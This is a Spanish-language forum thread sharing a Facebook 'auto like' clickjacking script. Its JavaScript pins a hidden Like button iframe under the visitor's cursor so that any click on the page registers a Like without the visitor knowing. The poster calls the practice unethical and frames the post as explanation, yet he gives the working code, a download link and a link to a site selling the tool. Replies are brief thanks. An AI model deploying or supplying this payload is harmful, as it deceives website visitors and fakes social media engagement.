LOG IN
Usuario:

Contraseña:


Últimos temas
» [PHPBB3] Tema Ubuntu
AutoClick Like Button Facebook 1vista = un like EmptyMar Feb 27, 2024 10:22 am por hoanglongnhatbao

» [PHPBB3] Fondo y otros efectos al texto llamado "Por X" debajo de los titulos de los post.
AutoClick Like Button Facebook 1vista = un like EmptyMar Mayo 30, 2023 8:52 am por hoanglongnhatbao

» Skin: Academy [Adaptado por: 15-tronos]
AutoClick Like Button Facebook 1vista = un like EmptyMar Mayo 30, 2023 8:47 am por hoanglongnhatbao

» [PHPBB3] KN-Anime - VAngel.
AutoClick Like Button Facebook 1vista = un like EmptyMar Mayo 30, 2023 8:46 am por hoanglongnhatbao

» [PHPBB3] Element Professional Style
AutoClick Like Button Facebook 1vista = un like EmptyMar Mayo 30, 2023 8:45 am por hoanglongnhatbao

» Menu minimalista
AutoClick Like Button Facebook 1vista = un like EmptyMar Mayo 30, 2023 8:44 am por hoanglongnhatbao

» [Todas] Efecto Slider Transition en el Logo
AutoClick Like Button Facebook 1vista = un like EmptyMar Mayo 30, 2023 8:43 am por hoanglongnhatbao

» [PHPBB3] Mejores Posteadores flotantes.
AutoClick Like Button Facebook 1vista = un like EmptyMar Mayo 30, 2023 8:41 am por hoanglongnhatbao

» [phpbb3] Agrandar el nombre de usuario en el perfil
AutoClick Like Button Facebook 1vista = un like EmptyMar Mayo 30, 2023 8:41 am por hoanglongnhatbao

Estadísticas
Tenemos 2351 miembros registrados
El último usuario registrado es Jhunky

Nuestros miembros han publicado un total de 41254 mensajes en 3360 argumentos.
Afiliados





No estás conectado. Conéctate o registrate

Ver el tema anterior Ver el tema siguiente Ir abajo  Mensaje [Página 1 de 1.]


Angel Sanchez

Angel Sanchez
Soy new user
AutoClick Like Button Facebook 1vista = un like




Esto es un script que coloca la caja del botón like del Facebook debajo del puntero del ratón y cuando das un click es igual a un like en tu página de Facebook.
Antes de compartir el código y lo necesario para esto quiero aclarar que estoy en contra de utilizar esto ya que no se me hace ético trabajar de esta manera engañando a tus visitantes, el fin de este post es que vean cómo funcionan sus ventajas y desventajas y no caigan en las otras web que te vendes este servicio.
Empesemos.
El script está a la venta en esta web http://nulledtools.seouyx.com/hijack...tton-facebook/ y en muchas más.
Ventajas
La única ventaja es que tus visitas se pueden convertir en like al dar click en cualquier parte de tu página.

Desventajas
1.-Si lo colocas en tu web el antivirus te detecta la web como posible amenaza, en mi caso lo detecto el avast en los equipos de unos amigos y en mi equipos no lo de detecto, utilizo nod32 .
2.-Como todos sabemos que cuando pasas el cursor por un link el cursor cambia a uno de una manita bueno esto para en todo el cuerpo de tu página (Es incomodo)
3.-Cuando detienes el cursor en una parte de tu página sale el título de “me gusta”
4.-Una vez que ya le distes me gusta por medio de un click en la página ya no te aparece el título de “me gusta” pero el problema es que cuando actualizas la página vuelve aparecer paro a hora con el título “ya no me gusta” y tu click se convierte en un deslike.

Código (También lo dejare en un link de descargar)




Facebook Auto Like Script



var interval;
$(function()
{
interval=setInterval("updateActiveElement();", 50);
});

function updateActiveElement()
{
if ( $(document.activeElement).attr('id')=="fbframe" )
{
clearInterval(interval);
iflag=1;
}
}









Haga clic en cualquier parte de la página.



A hora enta a www.facebook.com/ACsolutionsss y miren su nuevo like


.


















var iflag = 0;
var icontainer = document.getElementById('icontainer');
var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes



function mouseFollower(e){
/* DO NOT EDIT THIS */
if (window.event)
{ // for IE
icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
}
else
{
icontainer.style.top = (e.pageY-5)+'px';
icontainer.style.left = (e.pageX-5)+'px';
}

}
document.onmousemove = function(e) {
if (iflag == 0) {mouseFollower(e);}
}






Complemento jquery necesario.(Lo dejo en un link para descargar)
Yo utilice el jquery-1.5.min.


Descargar

https://mega.co.nz/#!rZ11jbDI!ChEybg...xzOg4soZ6wdNlk


Cleddy

Cleddy
Soy new user
interesante


damy_nqn

damy_nqn
Soy new user
se ve interesante che


MR Designer

MR Designer
Miembro activo
graciiiiiiiiiiiias


Contenido patrocinado


Ver el tema anterior Ver el tema siguiente Volver arriba  Mensaje [Página 1 de 1.]

Permisos de este foro:
No puedes responder a temas en este foro.